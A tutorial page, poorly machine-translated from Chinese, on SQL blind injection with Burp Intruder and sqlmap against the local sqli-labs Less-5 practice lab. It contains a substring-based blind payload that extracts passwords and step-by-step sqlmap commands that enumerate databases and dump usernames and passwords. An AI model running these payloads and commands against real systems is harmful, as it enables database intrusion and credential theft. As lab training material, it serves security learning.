当前位置:网站首页>[tools run SQL blind note]
[tools run SQL blind note]
2022-07-03 04:38:00 【Black zone (rise)】
Catalog
One 、( Tools )burp Running blind injection
1.2、 Method 2 : Injection statement explosion
Two 、( Tools )sqlmap Run Boolean blind injection
First step : Detect whether there is injection
The second step : Burst database name
The third step : Burst database table name
One 、( Tools )burp Running blind injection
1.1、 Method 1 : Blast
After grabbing the bag , Send the request to "Intruder" modular
Set up 2 Payloads
1.2、 Method 2 : Injection statement explosion
Inject construct statements , Iterate
(select case when '§0§' = lower(substring((select password from employees where empid=1),§1§,1)) then 1 else 0 end)
Two 、( Tools )sqlmap Run Boolean blind injection
2.1、 command :
-u Specify injection point
--dbs Run to the library name
--tables Running Watch name
--columns Run field name
--dump Enumerating data
Run out of the corresponding rear , Add... In turn -D Specify the library -T Designated table -C Specified field
2.2、 Use process :
First step : Detect whether there is injection
Basic operation
python sqlmap.py http://localhost:8080/sqli-labs-master/Less-5/?id=1 --batch
--batch Is to use the default settings
In fact, the environment has been swept out
You can add --dbms mysql 了
The second step : Burst database name
command
# Get all databases
sqlmap.py -u url --dbs --batch
---------
# Get the current database
sqlmap.py -u url --current-dbs --batch
Basic operation
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' --dbs --batch
The third step : Burst database table name
command
python sqlmap.py -u url -D DB --tables --batch
Basic operation
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security --tables --batch
Step four : Pop field name
command :
sqlmap.py -u url -D DB -T TBL --columns --batch
Basic operation
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users --columns --batch
Step five : Burst data
command :
sqlmap.py -u url -D DB -T TBL -C "COL1,COL2" --dump --batch
Basic operation :
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users -C "username,password" --dump --batch
3、 ... and 、 recommend
【SQL Inject - No echo 】 Bull's blind note : principle 、 function 、 Use process
【SQL Inject - With echo 】DNS Request injection : principle 、 platform 、 Using process 、 To configure
边栏推荐
- 2022 t elevator repair simulation examination question bank and t elevator repair simulation examination question bank
- Youdao cloud notes
- Introduction to JVM principle
- 金仓数据库KingbaseES 插件kdb_date_function
- 金仓KFS数据双向同步场景部署
- [software testing-6] & Test Management
- How to choose cross-border e-commerce multi merchant system
- Triangular rasterization
- Number of uniform strings of leetcode simple problem
- C Primer Plus Chapter 10, question 14 3 × 5 array
猜你喜欢
Youdao cloud notes
When using the benchmarksql tool to test the concurrency of kingbasees, there are sub threads that are not closed in time after the main process is killed successfully
When using the benchmarksql tool to preheat data for kingbasees, execute: select sys_ Prewarm ('ndx_oorder_2 ') error
Leetcode simple question: check whether the string is an array prefix
Triangular rasterization
P35-P41 fourth_ context
FISCO bcos zero knowledge proof Fiat Shamir instance source code
Integration of Android high-frequency interview questions (including reference answers)
![[literature reading] sparse in deep learning: practicing and growth for effective information and training in NN](/img/7e/50fa6f65b5a4f0bb60909f57daff56.png)
[literature reading] sparse in deep learning: practicing and growth for effective information and training in NN
Leetcode simple question: the key with the longest key duration
随机推荐
How to choose cross-border e-commerce multi merchant system
Solve BP Chinese garbled code
怎么用Kotlin去提高生产力:Kotlin Tips
FFMpeg filter
BMZCTF simple_ pop
How to use kotlin to improve productivity: kotlin tips
Introduction of pointer variables in function parameters
X-ray normal based contour rendering
Smart contract security audit company selection analysis and audit report resources download - domestic article
IPhone x forgot the boot password
Factor stock selection scoring model
C primre plus Chapter 10 question 6 inverted array
【SQL注入点】注入点出现位置、判断
Leetcode simple question: the key with the longest key duration
Contents of welder (primary) examination and welder (primary) examination in 2022
Triangular rasterization
Integration of Android high-frequency interview questions (including reference answers)
使用BENCHMARKSQL工具对kingbaseES执行灌数据提示无法找到JDBC driver
Reptile exercise 02
[literature reading] sparse in deep learning: practicing and growth for effective information and training in NN